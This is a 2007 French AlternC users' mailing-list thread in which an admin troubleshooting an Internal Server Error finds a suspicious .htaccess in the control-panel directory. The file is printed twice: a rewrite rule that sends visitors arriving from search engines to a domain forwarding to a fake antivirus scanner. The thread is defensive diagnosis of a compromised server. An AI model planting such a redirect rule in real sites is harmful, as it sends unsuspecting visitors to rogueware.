[AlternC-Users] Internal Server Error

Retour à l'archive de la liste
Le site d'AlternC
Google Custom Search

e-mail at fr-net.com e-mail at fr-net.com
Sam 1 Sep 14:27:58 CEST 2007


Merci pour l'explication.
A bien y regarder, étant donné que sur un autre serveur sous AlternC 
(0.9.6.1) il n'y a pas de .htaccess dans /var/alternc/bureau/ je me 
demande d'où sort celui-là.

De plus, dans le .htaccess incriminé, l'URL indiquée dans le 
RewriteCond, "http://rostoffhost.info/strf/", conduit à un site qui 
bascule sur http://scanner.spy-shredder.com/5/ qui est un faux scanner 
de virus qui vous incite à télécharger un exécutable sensé résoudre 
votre infection.

Voilà ce qu'on en dit (http://forum.malekal.com/sutra26156.php):
"SpyShredder est un rogue (faux anti-spyware) qui s'installe sans 
permission, le malware affiche de fausses alertes vous indiquant que 
vous êtes infectés par un spyware et vous recommande d'acheter 
l'anti-spyware SpyShredder qui est un produit commercial. "

Question : vu la "tête" de ce .htaccess (voir copie ci-après) et les 
remarques précédentes, est-il raisonnable de penser qu'il a été mis là 
de façon frauduleuse et que la seule chose recommandable est de le 
supprimer tout simplement?

------------------------------------------------------
RewriteEngine on
Options +FollowSymLinks

RewriteCond %{HTTP_REFERER} 
^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
RewriteRule .*$ http://rostoffhost.info/strf/ [L]
------------------------------------------------------

Merci,

tyrien


Le 1 sept. 07, à 13:00, Benjamin Sonntag a écrit :

> e-mail at fr-net.com a écrit :
>>
>> Le 1 sept. 07, à 11:48, Benjamin Sonntag a écrit :
>>
>>> Quand tu as un message Internal Server Error, il faut vérifier, juste
>>> après
>>> /var/log/apache-ssl/error.log
>>>
>>> par exemple avec tail -40 /var/log/apache-ssl/error.log
>>>
>>> Qui doit, tout en bas, te dire ce qui ne va pas. Si tu ne vois pas de
>>> quoi il s'agit, envoie-nous en réponse ici les 40 lignes et on 
>>> t'aidera.
>>
>> Merci. Evidemment, je ne comprends pas trop ces 40 lignes que je vous
>> soumets donc:
>>
>> [Sat Sep  1 08:47:17 2007] [alert] [client 82.246.92.144]
>> /var/alternc/bureau/.htaccess: Options not allowed here
>> [Sat Sep  1 08:49:59 2007] [alert] [client 82.246.92.144]
>> /var/alternc/bureau/.htaccess: Options not allowed here
> Tout est là :
>
> Options not allowed here
>
> donc
>     - soit tu vires la ligne options de ton .htaccess si tu n'as pas de
> liens symboliques dans ton /var/alternc/bureau
>     - soit tu as des liens symboliques, et donc il faut déplacer ce
> Options dans /etc/alternc/bureau.conf (lieu idéal pour cela) et 
> relancer
> apache-ssl
>     - soit tu autorises (déconseillé) la directive Options via un
> AllowOverride dans le httpd.conf, mais je ne sais plus quel override 
> ...
>
> @+
>
> Benjamin
> Serverside
> http://www.serverside.fr/
>>
>> Ça serait le fichier .htaccess qui pose problème? ...alors que
>> personne -- à ma connaissance -- n'y a touché ces derniers temps!
>>
>> Voilà le fichier /var/alternc/bureau/.htaccess :
>>
>> serv:/# cat /var/alternc/bureau/.htaccess
>> RewriteEngine on
>> Options +FollowSymLinks
>>
>> RewriteCond %{HTTP_REFERER}
>> ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
>> RewriteRule .*$ http://rostoffhost.info/strf/ [L]serv:/#
>>
>> Merci de ton aide.
> _______________________________________________
> Users mailing list
> Users at alternc.org
> http://alternc.org/cgi-bin/mailman/listinfo/users
>




Plus d'informations sur la liste de diffusion Users